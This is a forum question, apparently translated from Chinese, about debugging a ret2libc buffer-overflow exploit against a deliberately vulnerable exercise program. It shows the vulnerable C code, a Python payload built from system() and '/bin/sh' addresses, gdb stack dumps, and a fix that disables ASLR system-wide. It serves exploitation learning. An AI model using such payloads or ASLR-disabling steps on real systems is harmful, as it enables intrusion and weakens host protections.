分段错误 ret2libc 攻击

Segmentation Fault ret2libc attack

我正在尝试执行 ret2libc 攻击。 为此,我需要从 libc 调用 System() 并传递参数“/bin/sh”(/bin/sh 的地址)。不幸的是我每次都得到 "Segmentation Fault".

谁能告诉我为什么?如果我查看堆栈,一切看起来都很好(对我来说)。

这是我的源代码:

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xbf000000) == 0xbf000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
}

int main(int argc, char **argv)
{
  getpath();
}

我的漏洞利用代码如下:

    import struct
    offset = "A"*88
    system_adress = struct.pack("q",0x7ffff7a60510)
    nop = "\x90"*4
    bin_sh_adress = struct.pack("q",0x7ffff7b9b3f3)

    #libc_start = 0x7ffff7a1e000
    #sh_offset = 0x17d3f3
    #libc_start plus sh_Offset = 0x7ffff7b9b3f3

    print(offset + system_adress + nop + bin_sh_adress)

In the following my terminal commands:

>>> r < ./text
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/Desktop/ExerciseExploit/stack6 < ./text

Breakpoint 2, getpath () at stack6.c:11
11    printf("input path please: "); fflush(stdout);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x00000000  0x00000000  0x00f0b2ff  0x00000000
0x7fffffffe170: 0x000000c2  0x00000000  0xffffe1a6  0x00007fff
0x7fffffffe180: 0x00000001  0x00000000  0xf7abe905  0x00007fff
0x7fffffffe190: 0x00000001  0x00000000  0x5555485d  0x00005555
0x7fffffffe1a0: 0xf7de70e0  0x00007fff  0x00000000  0x00000000
0x7fffffffe1b0: 0xffffe1d0  0x00007fff  0x555547fd  0x00005555
0x7fffffffe1c0: 0xffffe2b8  0x00007fff  0x00000000  0x00000001
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
input path please: 13     gets(buffer);
>>> n

Breakpoint 1, getpath () at stack6.c:15
15    ret = __builtin_return_address(0);
>>> i r rsp rbp
rsp            0x7fffffffe160   0x7fffffffe160
rbp            0x7fffffffe1b0   0x7fffffffe1b0
>>> x/40xw $rsp
0x7fffffffe160: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe170: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe180: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe190: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1a0: 0x41414141  0x41414141  0x41414141  0x41414141
0x7fffffffe1b0: 0x41414141  0x41414141  0xf7a60510  0x00007fff
0x7fffffffe1c0: 0x90909090  0xf7b9b3f3  0x00007fff  0x00000000
0x7fffffffe1d0: 0x55554810  0x00005555  0xf7a3fa87  0x00007fff
0x7fffffffe1e0: 0x00000000  0x00000000  0xffffe2b8  0x00007fff
0x7fffffffe1f0: 0x00040000  0x00000001  0x555547e4  0x00005555
>>> n
17    if((ret & 0xbf000000) == 0xbf000000) {
>>> n
22    printf("got path %s\n", buffer);
>>> 

错误报告:

root@kali:~/Desktop/ExerciseExploit# python exploit6.py | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAA���
Segmentation fault

[关闭]

问题修复:

没有禁用 ASLR -> 禁用 ASLR:echo 0 > /proc/sys/kernel/randomize_va_space